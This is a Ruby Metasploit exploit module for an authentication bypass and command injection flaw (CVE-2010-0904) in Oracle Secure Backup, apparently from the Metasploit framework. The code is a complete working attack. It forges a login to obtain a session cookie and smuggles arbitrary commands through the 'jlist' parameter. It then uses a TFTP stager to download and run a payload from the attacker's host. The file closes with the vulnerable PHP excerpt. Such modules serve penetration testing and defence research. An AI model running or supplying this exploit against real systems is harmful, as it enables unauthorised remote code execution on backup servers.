##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability',
        'Description' => %q{
          This module exploits an authentication bypass vulnerability
          in login.php. In conjunction with the authentication bypass issue,
          the 'jlist' parameter in property_box.php can be used to execute
          arbitrary system commands.
          This module was tested against Oracle Secure Backup version 10.3.0.1.0
        },
        'Author' => [ 'MC' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2010-0904' ],
          [ 'OSVDB', '66338' ],
          [ 'ZDI', '10-118' ]
          # the jlist vector has not been disclosed or has it?
        ],
        'Targets' => [
          [
            'Windows Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'win'
            }
          ]
        ],
        'CmdStagerFlavor' => 'tftp',
        'Privileged' => true,
        'Platform' => 'win',
        'DisclosureDate' => '2010-07-13',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Use SSL', true]),
        OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
      ]
    )
  end

  def windows_stager
    print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
    tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
    execute_cmdstager({ temp: '.', tftphost: tftphost })
    @payload_exe = generate_payload_exe

    print_status("Attempting to execute the payload...")
    execute_command(@payload_exe)
  end

  def execute_command(cmd, opts = {})
    res = send_request_cgi(
      {
        'uri' => '/login.php',
        'data' => 'attempt=1&uname=-',
        'method' => 'POST',
      }, 5
    )

    if res.get_cookies.match(/PHPSESSID=(.*);(.*)/i)
      sessionid = res.get_cookies

      data = '?type=Job&jlist=0%26' + Rex::Text::uri_encode(cmd)

      send_request_raw(
        {
          'uri' => '/property_box.php' + data,
          'cookie' => sessionid,
          'method' => 'GET',
        }, 5
      )

    else
      print_error("Invalid PHPSESSION token..")
      return
    end
  end

  def exploit
    unless datastore['CMD'].blank?
      print_status("Executing command '#{datastore['CMD']}'")
      execute_command(datastore['CMD'])
      return
    end

    case target['Platform']
    when 'win'
      windows_stager
    else
      fail_with(Failure::Unknown, 'Target not supported.')
    end

    handler
  end
end

__END__
  else if (strcmp($type, "Job") == 0)
    {
    if (!is_array($objectname))
      $objectname = array();
    reset($objectname);
    while (list(,$oname) = each($objectname))
      {
      $oname = escapeshellarg($oname);
      $jlist = "$jlist $oname";
      }
    if (strlen($jlist) > 0)
      $msg = exec_qr("$rbtool lsjob -lrRLC $jlist");